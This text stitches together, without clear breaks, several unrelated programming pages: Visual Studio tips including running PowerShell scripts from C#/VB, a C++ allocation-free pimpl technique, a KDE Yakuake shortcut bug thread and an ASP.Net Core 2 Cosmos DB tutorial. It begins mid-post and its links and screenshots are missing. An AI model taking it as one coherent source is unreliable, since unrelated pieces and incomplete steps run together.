Voila! It's commented out. Okay, great, but what if you don't want to use the mouse? No problem! Just hold ALT + SHIFT + [UP or DOWN ARROW] to do a vertical selection (NOTE: In VS2008 you have to go right or left one character before you can go up or down for vertical selection):

Then press CTRL + K, CTRL + U (in this example):

And there you go! Comment and Uncomment actions anytime you want!

NOTE: There is an async version of his code that he does as a follow up. I don't use it because I want to remove extra code noise to focus on the act of calling the script itself.
If you want to take a stab at the async version (and there are LOTS of good reasons to do so) then you can go here: So, on to the goodness! First, you need to make sure you have Visual Studio (any version) installed and have PowerShell installed. You can get PowerShell from here: You will also need to do this (WARNING: MAJOR SECURITY ISSUE HERE AND THIS IS JUST FOR TESTING SO DON'T DO THIS ON PRODUCTION MACHINES): 1. Now, let's crank out a simple PoweShell script that we are interested in calling. We will call a simple script that takes a couple of numbers and returns the sum of those numbers. This may seem overly simplistic but it is an easy way to demonstrate a complete round-trip between our app and the script without getting bogged down in extra BS that comes with a fancier script. I'll call the script AddItUp.ps1 and it is included in the source code download, just put it anywhere you can get to easily. Feel free to dig into the guts of it later on but for now just assume it does what we need it to do. Here is the code for the script if you just want to make your own real quick: # begin function AddStuff($x,$y) { $x + $y } AddStuff 6 5 # end NOTE: Some inspiration and just a cool site for scripts came from just as an fyi 2. Test the script by opening PowerShell and navigating to the directory where it is and typing what you see in the graphic, you should get the expected result. 3. Okay! We have a script that works but now what? Well we have to call that puppy from our code so let's create a project and get ready to make our magic happen. Crank out a new Windows App for us to use. Call the Project CallMeCS or CallMeVB depending on your language. 4. For the interface, just gimme a button and a label. Resize the form a bit so we don't have wasted space. Real simple stuff... 5. Double-click on the button to go into our code. C#: VB: 6. Now we need to add an assembly that is one of a set we got with our install of PowerShell. 
You can find these assemblies at C:\Program Files\Reference Assemblies\Microsoft\WindowsPowerShell\v1.0 7. Right-click on your project and choose Add Reference... 8. Select the Browse Tab and locate these assemblies then add a reference to the System.Management.Automation.dll NOTE: If you want to dig deeper into the contents of this namespace, you can check it out here: 9. Now that we have our reference we need to add some using/imports statements to make getting to the classes we want to use easier. Make sure to put these at the top of your code page outside any other code. using System.Collections.ObjectModel; using System.Management.Automation; using System.Management.Automation.Runspaces; using System.IO; Imports System.Collections.ObjectModel Imports System.Management.Automation Imports System.Management.Automation.Runspaces Imports System.Text Imports System.IO 10. Okay, this next part is a little funkier. While I liked the code that Mikkers had, I wanted to be able to load up a file from my file system and use it instead of just putting code into a textbox. That created some VERY interesting new challenges but the end result worked out well. So, to that end, we will create two helper methods: RunScript and LoadScript. RunScript is the code essentially unchanged from Mikkers' article and LoadScript is my helper function that will load the contents of a script file and return a string. 11. Let's begin with the RunScript method. We will add this method to the Form1 class to make our life easier. 
C#:

// Takes script text as input and runs it, then converts
// the results to a string to return to the user
private string RunScript(string scriptText)
{
    // create Powershell runspace
    Runspace runspace = RunspaceFactory.CreateRunspace();

    // open it
    runspace.Open();

    // create a pipeline and feed it the script text
    Pipeline pipeline = runspace.CreatePipeline();
    pipeline.Commands.AddScript(scriptText);

    // add an extra command to transform the script output objects into nicely formatted strings
    // remove this line to get the actual objects that the script returns. For example, the script
    // "Get-Process" returns a collection of System.Diagnostics.Process instances.
    pipeline.Commands.Add("Out-String");

    // execute the script
    Collection<PSObject> results = pipeline.Invoke();

    // close the runspace
    runspace.Close();

    // convert the script result into a single string
    StringBuilder stringBuilder = new StringBuilder();
    foreach (PSObject obj in results)
    {
        stringBuilder.AppendLine(obj.ToString());
    }

    // return the results of the script that has
    // now been converted to text
    return stringBuilder.ToString();
}

VB:

' Takes script text as input and runs it, then converts
' the results to a string to return to the user
Private Function RunScript(ByVal scriptText As String) As String

    ' create Powershell runspace
    Dim MyRunSpace As Runspace = RunspaceFactory.CreateRunspace()

    ' open it
    MyRunSpace.Open()

    ' create a pipeline and feed it the script text
    Dim MyPipeline As Pipeline = MyRunSpace.CreatePipeline()
    MyPipeline.Commands.AddScript(scriptText)

    ' add an extra command to transform the script output objects into nicely formatted strings
    ' remove this line to get the actual objects that the script returns. For example, the script
    ' "Get-Process" returns a collection of System.Diagnostics.Process instances.
    MyPipeline.Commands.Add("Out-String")

    ' execute the script
    Dim results As Collection(Of PSObject) = MyPipeline.Invoke()

    ' close the runspace
    MyRunSpace.Close()

    ' convert the script result into a single string
    Dim MyStringBuilder As New StringBuilder()
    For Each obj As PSObject In results
        MyStringBuilder.AppendLine(obj.ToString())
    Next

    ' return the results of the script that has
    ' now been converted to text
    Return MyStringBuilder.ToString()
End Function

12. Now we want to add in our LoadScript method to make getting the script into a variable easier.

C#:

// helper method that takes your script path, loads up the script
// into a variable, and passes the variable to the RunScript method
// that will then execute the contents
private string LoadScript(string filename)
{
    try
    {
        // Create an instance of StreamReader to read from our file.
        // The using statement also closes the StreamReader.
        using (StreamReader sr = new StreamReader(filename))
        {
            // use a string builder to get all our lines from the file
            StringBuilder fileContents = new StringBuilder();

            // string to hold the current line
            string curLine;

            // loop through our file and read each line into our
            // stringbuilder as we go along
            while ((curLine = sr.ReadLine()) != null)
            {
                // read each line and MAKE SURE YOU ADD BACK THE
                // LINEFEED THAT THE ReadLine() METHOD STRIPS OFF
                fileContents.Append(curLine + "\n");
            }

            // return our file contents as a string; the caller
            // will pass this to RunScript
            return fileContents.ToString();
        }
    }
    catch (Exception e)
    {
        // Let the user know what went wrong.
        string errorText = "The file could not be read:";
        errorText += e.Message + "\n";
        return errorText;
    }
}

VB:

' helper method that takes your script path, loads up the script
' into a variable, and passes the variable to the RunScript method
' that will then execute the contents
Private Function LoadScript(ByVal filename As String) As String
    Try
        ' Create an instance of StreamReader to read from our file.
        Dim sr As New StreamReader(filename)

        ' use a string builder to get all our lines from the file
        Dim fileContents As New StringBuilder()

        ' string to hold the current line
        Dim curLine As String = ""

        ' loop through our file and read each line into our
        ' stringbuilder as we go along
        Do
            ' read each line and MAKE SURE YOU ADD BACK THE
            ' LINEFEED THAT THE ReadLine() METHOD STRIPS OFF
            curLine = sr.ReadLine()
            fileContents.Append(curLine + vbCrLf)
        Loop Until curLine Is Nothing

        ' close our reader now that we are done
        sr.Close()

        ' return our file contents as a string; the caller
        ' will pass this to RunScript
        Return fileContents.ToString()
    Catch e As Exception
        ' Let the user know what went wrong.
        Dim errorText As String = "The file could not be read:"
        errorText += e.Message + "\n"
        Return errorText
    End Try
End Function

13. Finally, we just need to add some code for our button's click event.
C#:

private void button1_Click(object sender, EventArgs e)
{
    // run our script and put the result into our textbox
    // NOTE: make sure to change the path to the correct location of your script
    textBox1.Text = RunScript(LoadScript(@"c:\users\zainnab\AddItUp.ps1"));
}

VB:

Private Sub Button1_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Button1.Click
    ' run our script and put the result into our textbox
    ' NOTE: make sure to change the path to the correct location of your script
    TextBox1.Text = RunScript(LoadScript("c:\users\zainnab\AddItUp.ps1"))
End Sub

14. That's it!! You should be able to run your code and you should get this:

Don't sweat it if you think this is a lot to type. I have included the source code for you to use. Enjoy!

Menu: Tools -> Import and Export Settings
Command: Tools.ImportandExportSettings
Versions: 2008, 2010
Published: 8/13/2010
Code: vstipEnv0034

Folks, I want to get your input on the possible title for the new book. Give me your comments at

Ever see a cool set of colors on your friend or co-worker's computer? Now that you see what you like, get them to export their Fonts and Colors. Go to Tools -> Import and Export Settings:

Click Next and ONLY export the Fonts and Colors, NOTHING ELSE:

Click Next, then give the settings a cool name and click Finish:

On the Studio Styles Site

Find the style you want and click on it:

Pick your Visual Studio version.

Click on "Download this scheme", then follow the instructions in the next section.

Changing Your Colors

Put the settings file on a USB key or somewhere you can get to it from your computer. While you can put the file anywhere you want on your system, I prefer to put it with the other settings files located at "C:\Users\<user>\Documents\Visual Studio <version>\Settings":

Now just go to Tools -> Import and Export Settings on your machine:

Click Next. If you haven't backed up your settings in a while, feel free to do so.
Check out vstipEnv0034 if you want more information on exporting your settings:

Pick the settings file that has the color scheme you want:

Click Next. Verify that the file is ONLY importing Fonts and Colors, then click Finish:

Danger Will Robinson

That's it! You should have your new colors. If things get bad (i.e. you get funky colors and don't have a backup) and you need to get the default colors back, all you have to do is go to Tools -> Options -> Fonts and Colors and click "Use Defaults". Be warned: this is a nuclear option for your colors and wipes out any custom colors used:

SKU: Premium, Ultimate
Versions: 2008, 2010
Code: vstipTool0131

When working with code metrics, one of the least understood items seems to be cyclomatic complexity:

"The SATC has found the most effective evaluation is a combination of size and [Cyclomatic] complexity. The modules with both a high complexity and a large size tend to have the lowest reliability. Modules with low size and high complexity are also a reliability risk because they tend to be very terse code, which is difficult to change or modify." [SATC]

There may be differences when calculating code metrics using Visual Studio 2010 that don't apply to Visual Studio 2008. The online documentation () gives the following reasons:

The bottom line is that a high complexity number means greater probability of errors with increased time to maintain and troubleshoot. Take a closer look at any functions that have a high complexity and decide if they should be refactored to make them less complex.
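To make the metric concrete (my own illustration, not from the article, and shown in Java simply to have a runnable example; Visual Studio computes the same metric for .NET code): cyclomatic complexity is roughly the number of decision points in a method plus one. The hypothetical method below has three decision points (the loop condition and two ifs), giving a complexity of 4; the usual refactoring is to extract the inner decisions into smaller, simpler methods.

```java
class ComplexityDemo {
    // Hypothetical method: 3 decision points (for, if, if) => complexity 3 + 1 = 4.
    // An else branch does not add to the count in McCabe's metric.
    static int scoreAboveThreshold(int[] values, int threshold) {
        int count = 0;
        for (int v : values) {          // decision 1: loop condition
            if (v > threshold) {        // decision 2
                if (v % 2 == 0) {       // decision 3
                    count += 2;         // even values above threshold score double
                } else {
                    count += 1;
                }
            }
        }
        return count;
    }

    public static void main(String[] args) {
        // 5 (odd, +1) and 8 (even, +2) are above 3; 2 is not.
        System.out.println(scoreAboveThreshold(new int[]{2, 5, 8}, 3)); // prints 3
    }
}
```

A tool reports one number per method, so splitting this into `scoreOne(v, threshold)` plus a loop would drop each method's complexity to 2-3.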
http://blogs.msdn.com/b/zainnab/default.aspx?PostSortBy=MostViewed&PageIndex=1
Pimpl is a common idiom in C++. It means hiding the implementation details of a class with a construct that looks like this:

class pimpl;

class Thing {
private:
    pimpl *p;
public:
    ...
};

This cuts down on compilation time because you don't have to #include all headers required for the implementation of this class. The downside is that p needs to be dynamically allocated in the constructor, which means a call to new. For often constructed objects this can be slow and lead to memory fragmentation.

Getting rid of the allocation

It turns out that you can get rid of the dynamic allocation with a little trickery. The basic approach is to preserve space in the parent object with, say, a char array. We can then construct the pimpl object there with placement new and delete it by calling the destructor. A header file for this kind of a class looks something like this:

#ifndef PIMPLDEMO_H
#define PIMPLDEMO_H

#define IMPL_SIZE 24

class PimplDemo {
private:
    char data[IMPL_SIZE];

public:
    PimplDemo();
    ~PimplDemo();

    int getNumber() const;
};

#endif

IMPL_SIZE is the size of the pimpl object. It needs to be manually determined. Note that the size may be different on different platforms.

The corresponding implementation looks like this.

#include "pimpldemo.h"
#include <vector>

using namespace std;

class priv {
public:
    vector<int> foo;
};

#define P_DEF priv *p = reinterpret_cast<priv*>(data)
#define P_CONST_DEF const priv *p = reinterpret_cast<const priv*>(data)

PimplDemo::PimplDemo() {
    static_assert(sizeof(priv) == sizeof(data), "Pimpl array has wrong size.");
    P_DEF;
    new(p) priv;
    p->foo.push_back(42); // Just for show.
}

PimplDemo::~PimplDemo() {
    P_DEF;
    p->~priv();
}

int PimplDemo::getNumber() const {
    P_CONST_DEF;
    return (int)p->foo.size();
}

Here we define two macros that create a variable for accessing the pimpl. At this point we can use it just as if it were defined in the traditional way.
Note the static assert that checks, at compile time, that the space we have reserved for the pimpl is the same as what the pimpl actually requires.

We can test that it works with a sample application.

#include <cstdio>
#include <vector>
#include "pimpldemo.h"

int main(int argc, char **argv) {
    PimplDemo p;
    printf("Should be 1: %d\n", p.getNumber());
    return 0;
}

The output is 1, as we would expect. The program is also Valgrind clean, so it works just the way we want it to.

When should I use this technique?

Never! Well, ok, never is probably a bit too strong. However, this technique should be used very sparingly. Most of the time the new call is insignificant. The downside of this approach is that it adds complexity to the code. You also have to keep the backing array size up to date as you change the contents of the pimpl.

You should only use this approach if you have an object in the hot path of your application and you really need to squeeze the last bit of efficiency out of your code. As a rough guide, only about 1 of every 100 classes should ever need this. And do remember to measure the difference before and after. If there is no noticeable improvement, don't do it.
http://voices.canonical.com/jussi.pakkanen/tag/performance/
Version: 2.9.7
OS: Linux

in yakuake 2.9.7, the keyboard shortcut ctrl-shift-+ is assigned to "increase font size", and ctrl-shift-- is assigned to "reduce font size", and i can't seem to change those shortcuts! in joe, which is my console editor of choice, ctrl-_ is the undo function... and on a german keyboard, _ is shift-- which basically means in yakuake 2.9.7 on a german keyboard there is no undo.

Reproducible: Always

Steps to Reproduce:
1. set keyboard to german
2. edit a file in joe in a yakuake terminal
3. try to undo a change with ctrl-_

Actual Results: the fontsize in yakuake decreases

Expected Results: the change in joe should be undone

OS: Linux (i686) release 2.6.34-12-pae
Compiler: gcc

This is a bug in Konsole that causes its shortcuts to be exposed in the Konsole KPart component which Yakuake embeds, when they shouldn't be. The only thing you can do is change the shortcuts in Konsole, sorry.

i already thought of that and tried it. in konsole, those hotkeys are set to "NONE" for me, and still yakuake does the font thing.

Then Konsole may have changed recently so it not only exposes its shortcuts in its KPart but doesn't load the settings values, so they're always the defaults. Yakuake's codebase has no functionality to change the font size in any way (the terminal area is provided by the Konsole KPart component, which has no API by which the hosting application could manipulate the terminal font anyway). What I can do is blacklist and disable the actions from the Yakuake side, I've already done that for some other actions. But this really is a Konsole bug, so I'll reassign it there.

For the technical record: The actions that Konsole pollutes the hosting app's "namespace" with aren't even in the KPart's actionCollection().

SVN commit 1165837 by hein:

Blacklist Konsole's font actions.
CCBUG: 248469

M +6 -0 terminal.cpp

WebSVN link:

strangely enough in konsole itself those keyboard shortcuts do not work anymore after i switched them off...
so i guess its only the konsole KPART that does not read its settings properly, or sumthin like that.

*** Bug 254472 has been marked as a duplicate of this bug. ***

(In reply to comment #4)
> SVN commit 1165837 by hein:
>
> Blacklist Konsole's font actions.
> CCBUG: 248469
>
> M +6 -0 terminal.cpp
>
> WebSVN link:

The patch didn't help when applied against yakuake-2.9.7. This bug is a real showstopper for Bash and Emacs(-like) users :-(

Yeah, I can confirm that the patch doesn't work, unfortunately.

*** This bug has been confirmed by popular vote. ***

*** Bug 230915 has been marked as a duplicate of this bug. ***

Git commit 08de49da1cf4c89c375d7eea267bce3b46c05527 by Jekyll Wu.
Committed on 01/03/2012 at 01:58.
Pushed by jekyllwu into branch 'master'.

konsolepart should not expose actions only meaningful to Konsole

Note: some actions, such as enlarging/shrinking font and setting encoding, might actually be also useful in konsolepart. But since konsolepart currently always uses the default shortcut, the general idea now is to expose as few actions as possible in konsolepart.

FIXED-IN: 4.9.0
REVIEW: 104034
CCMAIL: hein@kde.org

M +43 -32 src/SessionController.cpp
M +2 -1 src/SessionController.h

I get the ambiguous action for Ctrl+Shift+W with Yakuake + Konsole. This has been opened as a separate report here:

In Yakuake, each terminal split inside a tab seems to be a Konsole part, and the tabs are managed by Yakuake. Intuitively, it is expected that Ctrl+Shift+W closes a Yakuake tab like in Konqueror, and this tab may contain many Konsole parts. Interestingly, ctrl-shift-t works as expected in Yakuake, so the Konsole part does not expose it. Why should ctrl-shift-w be exposed then, since those actions are somewhat opposite? It seems more logical not to expose ctrl-shift-w as well.
https://bugs.kde.org/show_bug.cgi?id=248469
I'm in the writer's chair, though, so this will be somewhat opinionated. We'll be ignoring some pre-packaged solutions (like Identity, Entity Framework), shipping in small increments, and aiming for a balance between YAGNI and a clean foundation.

Who is this for?

If you have worked with earlier versions of ASP.Net Core and need a hand starting with Core 2, wanted to try out Cosmos DB, wondered how to create custom authentication without the clumsy abstraction of the Identity model, or worked in other ASP.Net projects but never created one on your own... I hope this will help.

Bite-size pieces

It would be easy to jump ahead and start coding up a solution, but I like to attack problems in bite-size pieces. Taking small, defined steps forward and locking them in provides a sense of forward momentum and a safer foundation when we reach the areas we're less familiar with. I'm not 100% sure how far this series is going to go, but I need this foundation for a side project, so at a minimum we will:

- Create an ASP.Net Core 2 app, without bothering with bootstrap
- Put it in source control
- Explore basic usage of Cosmos DB by writing some simple CRUD pages
- Apply the newest iteration of ASP.Net Authentication
- Expand to support multiple authentication methods
- Apply better patterns for Cosmos DB setup and usage
- Ensure forms are safe from cross-site request forgery
- ...And maybe: solid error handling, generic error pages, basic instrumentation, API token authentication, CI/CD, unit tests, and more

We will do this all without letting the standard templates steer us into using bootstrap, Entity Framework, "install all the things" authentication checkboxes, buttons that manually deploy completely unrepeatable local builds, or any other magic that would get in the way of learning how these things work.

Ready? Awesome, let's go!

Task 1: Create the Solution

We'll start with the ASP.Net Core Web Application with the API template (Create new project...).
This includes the minimal set of nuget packages we need without creating piles of example and template files we'd have to go through and clean out. Also be sure not to choose an Authentication option. That magic is best left for temporary projects when you're trying to decode the documentation, but don't want to accidentally add 100 packages to your real system.

Creating an ASP.Net Core 2 Project

This template has minimal magic; we get a basic ASP.Net Core 2 website with a single Values API Controller. Let's lock in this first win by pressing F5 to run the site and verify we have a working API that returns the hard-coded sample values from ValuesController.Get():

ASP.Net Core 2 – Default ValuesController Output

Good. It only took a few seconds to verify, and now we can move on knowing it works and what port we're working on. The next step is moving from raw API output to HTML output.

Adding the First MVC Page

We started with an API project template, but unlike prior versions of ASP.Net it is pretty easy to start adding MVC capabilities. Another alternative would have been . I chose MVC because I have more extensive experience with past versions, reducing the number of unknowns I'll be working with in this project.

Following the expected conventions, let's add a "Controllers" folder to the project. Then we can use the right-click context menu from there to "Add New Item" and pick an ASP.Net Core Controller Class:

ASP.Net Core 2: Add New Item – Controller Class

Like earlier versions, a Controller Class is a standard C# class that inherits from Controller, so you also have the option of just creating a basic class and adding the "Controller" suffix and inheritance yourself, for a few less clicks.

The default for routing with this project is attribute routing rather than the global route registered in most earlier MVC versions. Add a [Route("")] attribute above the class declaration to route base-level "/" paths to this controller.
SampleCosmosCore2App/Controllers/HomeController.cs

// ...
namespace SampleCosmosCore2App.Controllers
{
    [Route("")]
    public class HomeController : Controller
    {
        public IActionResult Index()
        {
            return View();
        }
    }
}

Next we'll add a Layout.cshtml file to serve as the general HTML layout for the site. Again we want to match the standard ASP.Net MVC conventions, so first create a top-level folder named Views, then create a folder under this named Shared, then finally right-click this folder to "Add View", ensure you have Empty Model and no layout selected, with the name "Layout".

ASP.Net Core 2 – Add View Dialog

Note: if you can't edit the name of the folder you just added, see if you're still running in "Debug" and press Stop.

Once created, edit the Layout.cshtml file to look like this:

SampleCosmosCore2App/Views/_Shared/Layout.cshtml

<!DOCTYPE html>
<html>
<head>
    <meta name="viewport" content="width=device-width" />
    <title>Layout</title>
</head>
<body>
    @RenderBody()
</body>
</html>

Finally, we'll create the first view for HomeController. Create a Home subfolder under Views, then right-click and "Add View" again. This time select "Layout.cshtml" as the layout, but continue to leave Model empty.

Note: If you haven't done much MVC in the past, the naming is important because MVC, by convention, will automatically look for views in /Views/ControllerName/ActionName.cshtml when we don't provide a full path.

Warning: Unlike prior versions of MVC, ASP.Net Core 2 is not smart enough to match BlahBlahAsync actions with BlahBlah.cshtml. There is an open bug for this that won't be addressed until ASP.Net Core 3 due to concerns that this would cause breaking changes if added to ASP.Net Core 2.

Here we go:

/SampleCosmosCore2App/Views/Home/Index.cshtml

@{
    ViewData["Title"] = "Home";
    Layout = "~/Views/_Shared/Layout.cshtml";
}

<h2>Home</h2>

Time to lock in our winnings again before we move on. Hit F5 and visit the root URL () to verify we have the first task completed successfully.
Excellent, time to move on.

Task 2: Set Up Source Control

The best way to lock in progress is to commit it to source control. This gives us a way to not only save our incremental progress, but also back out of experiments that go awry. For this post, I'm using git with github as a remote repository.

Open up a terminal window (I prefer Powershell with the posh-git plugin), and type git init in the root folder of the solution:

Initializing a git repository

There are a number of files we don't want to commit and share, such as binaries from the build, user-specific settings in Visual Studio, and so on. We also need to help future us install the right dependencies when we come back to this later. So let's create a .gitignore for the first and README.md for the latter. I typically start this in the console (powershell again) out of habit:

wget -O .gitignore
echo "" > README.md

One last file to consider is a license statement. You can use choosealicense.com to help pick one, and providers like github are pretty smart about providing additional visibility when you use a standard one they recognize.

At this point, we'll also add some minimal info to the README while it's fresh in our minds. A good start is the name of the project and a section outlining the dependencies so far:

# Overview

Blah blah, amazing things...

# Dependencies

* Visual Studio 2017
* ASP.Net Core 2
* .Net Core 2

Finally, we'll save all this with the first commit as a starting point. Visual Studio includes tooling for git, you can also use third party tools like gitkraken and smartgit, or you can stick to the command-line. I personally use posh-git, which I find to be better than the basic git command-line.
So that we don't get too side-tracked, here's how I'm going to commit this via command-line:

git add -A
git commit -m "Initial Commit" -m "ASP.Net Core 2 project with working MVC endpoint, README, and .gitignore"

Third Party Git Repo: Github

First, log into the git provider (in my case github) and create a repository. Once this is done, the service should give you instructions to connect and push your changes to that remote repository. They'll look something like this:

git remote add origin git@your-provider.com:your-username/your-repo-name.git
git push -u origin master

You don't have to use origin as the remote name, but it is a common convention that many providers build some assumptions around in their interface. We're now safe from losing all our work on the local machine; task 2 is complete!

Task 3: Wire in Cosmos DB

Now it's time to figure out how to do some basic tasks with Cosmos DB. This will require obvious things like queries and inserting data, as well as less obvious tasks like figuring out where to record secrets for the local development environment, setting up a local emulator, and more (another reason we're doing this in bite-size pieces, there's always surprises).

You have the option of using a live Cosmos DB instance in Azure or using the emulator for local development. I prefer emulators for local development, but not all services include them. Download the emulator here: Cosmos DB Emulator

Next, I'm going to insist on creating a new project to house my database logic. In some cases this is too early to make architectural decisions like this, but I know from vast personal experience that I have never, ever enjoyed the experience of having this type of logic mixed into my ASP.Net project. This new project is going to be called "SampleCosmosCore2App.Core".
If you haven't added many projects to solutions, the usual procedure is:

- Right click the Solution and select "Add", "New Project"
- Select "Class Library (.NET Core)"
- Give it a name and continue

Then reference the new project from the ASP.Net one:

- Right click the MVC project
- Select "Add", "Reference" and check the box next to the "*.Core" project

ASP.Net Core – Adding Project Reference

At this point, I don't know what I don't know, so my aim is simplistic, working logic. Once I get that far, I can start looking into repeatable and more production-ready patterns with the context of knowing some basics from my first pass. The goal at this point is to complete a vertical slice, from UI down to back-end data store.

I'm using sample data structures because this will be experimental work. Sample data structures help me learn the patterns I'll use for real data structures, but are incredibly easy to tear out later to make sure I don't leave behind technical debt from the exploratory stage.

I'm going to work with a data class named Sample, so I'll create a Sample.cs class file and a Persistence.cs class file. The first will be a serializable document, the second the class that handles reading and writing that document to Cosmos DB.

Add the Microsoft.Azure.DocumentDB.Core nuget package to your "*.Core" project:

Add Microsoft.Azure.DocumentDB.Core package

Right click the "Dependencies" folder of the "*.Core" project and search for it, or use the Package Manager Console and type Install-Package Microsoft.Azure.DocumentDB.Core SampleCosmosCore2App.Core (use your project name, not mine).

Next, in the Persistence class, we'll add functions to set up the Sample DocumentCollection in Cosmos and perform common CRUD operations for documents in that collection:

SampleCosmosCore2App.Core/Persistence.cs

// ...
public Persistence(Uri endpointUri, string primaryKey)
{
    _databaseId = "QuoteServiceDB";
    _endpointUri = endpointUri;
    _primaryKey = primaryKey;
}

public async Task EnsureSetupAsync()
{
    if (_client == null)
    {
        _client = new DocumentClient(_endpointUri, _primaryKey);
    }

    await _client.CreateDatabaseIfNotExistsAsync(new Database { Id = _databaseId });

    var databaseUri = UriFactory.CreateDatabaseUri(_databaseId);

    // Samples
    await _client.CreateDocumentCollectionIfNotExistsAsync(databaseUri, new DocumentCollection() { Id = "SamplesCollection" });
}

// ...

If you're not familiar with Document Databases, you can think of this DocumentCollection as a table, except instead of a single row that fits a very strict schema we can add any structured document we want and search against them later, letting the database handle the heavy lifting if we have vastly different and/or deep document structures.

And a data object like so:

SampleCosmosCore2App.Core/Sample.cs

public class Sample
{
    [JsonProperty(PropertyName = "id")]
    public string Id { get; set; }

    public string Content { get; set; }
}

Each document in Cosmos DB will have an id property and, by default, it will generate that id value for us when we add a new document.

The JsonProperty above: Cosmos DB serializes with the same case you use in your call, by default. We want this Id to bind to the one Cosmos DB will create on the document, so we tell it to serialize/deserialize Id as id. Alternatively, you can override the default casing with JsonSerializerSettings via the DocumentClient constructor to set JSON.Net's NamingStrategy for the SDK client.

Returning to the Persistence class, we'll add some basic CRUD operations to Save, Get, and Get All:

SampleCosmosCore2App.Core/Persistence.cs

// ...
public async Task SaveSampleAsync(Sample sample)
{
    await EnsureSetupAsync();
    var documentCollectionUri = UriFactory.CreateDocumentCollectionUri(_databaseId, "SamplesCollection");
    await _client.UpsertDocumentAsync(documentCollectionUri, sample);
}

public async Task<Sample> GetSampleAsync(string Id)
{
    await EnsureSetupAsync();
    var documentUri = UriFactory.CreateDocumentUri(_databaseId, "SamplesCollection", Id);
    var result = await _client.ReadDocumentAsync<Sample>(documentUri);
    return result.Document;
}

public async Task<List<Sample>> GetSamplesAsync()
{
    await EnsureSetupAsync();
    var documentCollectionUri = UriFactory.CreateDocumentCollectionUri(_databaseId, "SamplesCollection");

    // build the query
    var feedOptions = new FeedOptions() { MaxItemCount = -1 };
    var query = _client.CreateDocumentQuery<Sample>(documentCollectionUri, "SELECT * FROM Sample", feedOptions);
    var queryAll = query.AsDocumentQuery();

    // combine the results
    var results = new List<Sample>();
    while (queryAll.HasMoreResults)
    {
        results.AddRange(await queryAll.ExecuteNextAsync<Sample>());
    }

    return results;
}

// ...

This provides all the persistence methods we need; now we can move up to the ASP.Net project and add in the Controller actions and views. Again, I'm in experimental mode, so I'm making sure the database and DocumentCollection exist on every call, but later I'll find a better pattern for this.

Dependency Injection is built into ASP.Net Core, so to make an instance of this new Persistence class available to Controllers we can register it in Startup.cs like so:

SampleCosmosCore2App/Startup.cs

services.AddScoped<Persistence>((s) => {
    return new Persistence(
        new Uri(Configuration["CosmosDB:URL"]),
        Configuration["CosmosDB:PrimaryKey"]);
});

Then in our local development config we'll add the emulator URL and Primary Key:

SampleCosmosCore2App/appsettings.Development.json

{
  // ...
  "CosmosDB": {
    "URL": "",
    "PrimaryKey": "..."
  }
}

I've used a Scoped service so that a fresh Persistence object will be created for each Request. This will result in a fresh DocumentClient created on each request further down the stack, which is a safe starting point when I'm working with something new that I haven't dug too deep on yet. Later on, we'll start taking a more real approach to this and find out that Microsoft provides performance guidance that says we should instead create this as a singleton.

Next, we need Controller Actions to show the list of Sample values, Create a new one, Edit one, and Post edited contents to be saved. To keep this simple, we can wire these to two Views: a list of all of the items and an editable display of one.

SampleCosmosCore2App/Controllers/HomeController.cs

[Route("")]
public class HomeController : Controller
{
    private Persistence _persistence;

    public HomeController(Persistence persistence)
    {
        _persistence = persistence;
    }

    [HttpGet()]
    public async Task<IActionResult> IndexAsync()
    {
        var samples = await _persistence.GetSamplesAsync();
        return View("Index", samples);
    }

    [HttpGet("Create")]
    public IActionResult Create()
    {
        var sample = new Sample() { };
        return View("Get", sample);
    }

    [HttpGet("{id}")]
    public async Task<IActionResult> GetAsync(string id)
    {
        var sample = await _persistence.GetSampleAsync(id);
        return View("Get", sample);
    }

    [HttpPost()]
    public async Task<IActionResult> PostAsync([FromForm] Sample sample)
    {
        await _persistence.SaveSampleAsync(sample);
        return RedirectToAction("IndexAsync");
    }
}

Here are the notable changes:

- We've added Persistence as a necessary dependency in the Controller
- We've switched all Actions to async to support the Persistence methods
- IndexAsync gets the list of Samples and displays them in the "Index" view
- Create constructs a new Sample and displays it in the editable "Get" view
- GetAsync does the same thing, but loads the Sample from Persistence for the passed {id} in the route
- PostAsync binds the posted form to a Sample, saves it via Persistence, and
redirects back to showing the whole list

You can easily generate a scaffolded view for these by right-clicking in an Action above and selecting "New View". Pick the List or Edit templates as a starting point, with the model class set to the Sample object.

Because we started from a blank slate, these templates won't work directly out of the box (stackoverflow). Add a file _ViewImports.cshtml to register the tag helpers:

SampleCosmosCore2App/Views/_ViewImports.cshtml

@addTagHelper *, Microsoft.AspNetCore.Mvc.TagHelpers

The scaffolded views also assume we're using bootstrap and include 2-3x more HTML than we actually need, so we can trim them down quite a bit:

SampleCosmosCore2App/Views/Get.cshtml

@model SampleCosmosCore2App.Core.Sample
@{
    ViewData["Title"] = "GetAsync";
}
<form method="post">
    Id: @Model.Id
    <input asp-for="Id" /><br />
    Content:
    <input asp-for="Content" /><br />
    <input type="submit" value="Save" />
</form>
<a asp-action="IndexAsync">Back to List</a>

SampleCosmosCore2App/Views/Index.cshtml

@model IEnumerable<SampleCosmosCore2App.Core.Sample>
@{
    ViewData["Title"] = "View";
}
<p>
    <a asp-action="Create">Create New</a>
</p>
<table class="table">
    <thead>
        <tr>
            <th>
                @Html.DisplayNameFor(model => model.Id)
            </th>
            <th>
                @Html.DisplayNameFor(model => model.Content)
            </th>
            <th></th>
        </tr>
    </thead>
    <tbody>
        @foreach (var item in Model)
        {
            <tr>
                <td>
                    @Html.DisplayFor(modelItem => item.Id)
                </td>
                <td>
                    @Html.DisplayFor(modelItem => item.Content)
                </td>
                <td>
                    @Html.ActionLink("Edit", "GetAsync", new { id = item.Id })
                </td>
            </tr>
        }
    </tbody>
</table>

And now we have a very simple CRUD interface:

ASP.Net Core 2 – Basic CRUD Interface to Cosmos DB

Add and edit some items to make sure it's working, then commit the changes to lock it in. We now have a complete vertical slice from the UI down to the Cosmos DB store!
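To make the earlier casing discussion concrete (my sketch, not from the original post; the id value is a made-up placeholder, since Cosmos DB generates a GUID when we omit it, and the server also stamps system properties such as _rid and _etag onto stored documents): a Sample saved by SaveSampleAsync ends up stored as JSON along these lines, with lowercase "id" thanks to the JsonProperty attribute and "Content" keeping its C# casing:

```
{
  "id": "3f1c9d2a-0000-0000-0000-placeholder0",
  "Content": "hello cosmos"
}
```

This is also why the "SELECT * FROM Sample" query deserializes cleanly back into our Sample class.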
Looking Forward

Almost none of this code is likely to survive into the final app, but we've completed several steps forward:

- We can serve up HTML and API content
- We've got some basic CRUD logic with Cosmos DB
- We have source control and a basic README

